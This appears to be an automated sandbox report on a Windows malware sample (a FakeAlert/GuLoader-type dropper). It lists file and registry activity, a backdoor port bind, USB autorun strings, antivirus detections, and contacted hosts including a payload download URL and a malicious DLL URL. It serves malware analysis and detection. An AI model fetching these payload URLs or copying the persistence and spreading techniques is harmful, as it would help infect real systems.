Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_0040B2D4 GetLocalTime,

6_2_0040B2D4

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_0047E020 GetTimeZoneInformation,

6_2_0047E020

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_00472E58 GetUserNameA,

6_2_00472E58

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_00446564 GetVersion,

6_2_00446564

Contains functionality to launch a control a shell (cmd.exe)

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: cmd.exe /C	6_2_00475384
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: cmd.exe /C	9_2_00475384
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: cmd.exe /C	12_2_00475384

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\ProgramData\Synaptics\Synaptics.exe

Code function: 9_2_0047C7BC bind,

9_2_0047C7BC

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.217.168.14	docs.google.com	United States		15169	GOOGLEUS	false
69.42.215.252	freedns.afraid.org	United States		17048	AWKNET-LLCUS	false

Contacted Domains

Name	IP	Active
freedns.afraid.org	69.42.215.252	true
docs.google.com	172.217.168.14	true
xred.mooo.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978	false		high
http://2.58.149.33/ominz_QLUnxlrvVz46.bin	true	Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for URL or domain

Source: http://xred.site50.net/syn/SSLLibrary.dll

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe	Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1	Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmp	Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmp	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmp	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\RCXCD96.tmp	Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\ProgramData\Synaptics\RCXCD96.tmp	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\Synaptics.exe	Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\ProgramData\Synaptics\Synaptics.exe	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp	Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006

Found malware configuration

Source: 00000007.00000002.532970198.00000000030C0000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://2.58.149.33/ominz_QLUnxlrvVz46.bin"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Virustotal: Detection: 62%			Perma Link
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	ReversingLabs: Detection: 58%

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

Avira: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1	Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 0.2.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 9.0.Synaptics.exe.400000.4.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 9.0.Synaptics.exe.400000.4.unpack	Avira: Label: W2000M/Dldr.Agent.17651006
Source: 12.2.Synaptics.exe.400000.0.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 12.2.Synaptics.exe.400000.0.unpack	Avira: Label: W2000M/Dldr.Agent.17651006
Source: 9.2.Synaptics.exe.400000.0.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 9.2.Synaptics.exe.400000.0.unpack	Avira: Label: W2000M/Dldr.Agent.17651006
Source: 6.0.uniformerede.exe.4b8e14.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 6.2.uniformerede.exe.400000.0.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 6.2.uniformerede.exe.400000.0.unpack	Avira: Label: W2000M/Dldr.Agent.17651006
Source: 9.0.Synaptics.exe.400000.2.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 9.0.Synaptics.exe.400000.2.unpack	Avira: Label: W2000M/Dldr.Agent.17651006
Source: 0.2.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.a07634.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 9.0.Synaptics.exe.400000.0.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 9.0.Synaptics.exe.400000.0.unpack	Avira: Label: W2000M/Dldr.Agent.17651006
Source: 6.2.uniformerede.exe.4b8e14.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 6.0.uniformerede.exe.400000.0.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 6.0.uniformerede.exe.400000.0.unpack	Avira: Label: W2000M/Dldr.Agent.17651006
Source: 12.0.Synaptics.exe.400000.0.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 12.0.Synaptics.exe.400000.0.unpack	Avira: Label: W2000M/Dldr.Agent.17651006
Source: 9.0.Synaptics.exe.400000.3.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 9.0.Synaptics.exe.400000.3.unpack	Avira: Label: W2000M/Dldr.Agent.17651006
Source: 9.0.Synaptics.exe.400000.1.unpack	Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 9.0.Synaptics.exe.400000.1.unpack	Avira: Label: W2000M/Dldr.Agent.17651006

Uses 32bit PE files

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source: unknown	HTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49737 version: TLS 1.2

Source: C:\Users\user\Desktop\._cache_uniformerede.exe

Registry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\URBANITETENS

Jump to behavior

May infect USB drives

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: autorun.inf
Source: uniformerede.exe	Binary or memory string: autorun.inf
Source: uniformerede.exe	Binary or memory string: [autorun]
Source: uniformerede.exe, 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmp	Binary or memory string: [autorun]
Source: uniformerede.exe, 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmp	Binary or memory string: [autorun]
Source: uniformerede.exe, 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmp	Binary or memory string: autorun.inf
Source: Synaptics.exe	Binary or memory string: autorun.inf
Source: Synaptics.exe	Binary or memory string: [autorun]
Source: Synaptics.exe, 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: [autorun]
Source: Synaptics.exe, 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: [autorun]
Source: Synaptics.exe, 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: autorun.inf
Source: Synaptics.exe	Binary or memory string: autorun.inf
Source: Synaptics.exe	Binary or memory string: [autorun]
Source: Synaptics.exe, 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: [autorun]
Source: Synaptics.exe, 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: [autorun]
Source: Synaptics.exe, 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmp	Binary or memory string: autorun.inf
Source: uniformerede.exe.0.dr	Binary or memory string: [autorun]
Source: uniformerede.exe.0.dr	Binary or memory string: [autorun]
Source: uniformerede.exe.0.dr	Binary or memory string: autorun.inf
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr	Binary or memory string: [autorun]
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr	Binary or memory string: [autorun]
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr	Binary or memory string: autorun.inf
Source: YC9w8Aif.exe.9.dr	Binary or memory string: [autorun]
Source: YC9w8Aif.exe.9.dr	Binary or memory string: [autorun]
Source: YC9w8Aif.exe.9.dr	Binary or memory string: autorun.inf
Source: ~$cache1.9.dr	Binary or memory string: [autorun]
Source: ~$cache1.9.dr	Binary or memory string: [autorun]
Source: ~$cache1.9.dr	Binary or memory string: autorun.inf
Source: RCXF979.tmp.9.dr	Binary or memory string: [autorun]
Source: RCXF979.tmp.9.dr	Binary or memory string: [autorun]
Source: RCXF979.tmp.9.dr	Binary or memory string: autorun.inf
Source: RCXCD96.tmp.6.dr	Binary or memory string: [autorun]
Source: RCXCD96.tmp.6.dr	Binary or memory string: [autorun]
Source: RCXCD96.tmp.6.dr	Binary or memory string: autorun.inf
Source: Synaptics.exe.6.dr	Binary or memory string: [autorun]
Source: Synaptics.exe.6.dr	Binary or memory string: [autorun]
Source: Synaptics.exe.6.dr	Binary or memory string: autorun.inf
Source: RCXDA77.tmp.9.dr	Binary or memory string: [autorun]
Source: RCXDA77.tmp.9.dr	Binary or memory string: [autorun]
Source: RCXDA77.tmp.9.dr	Binary or memory string: autorun.inf

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

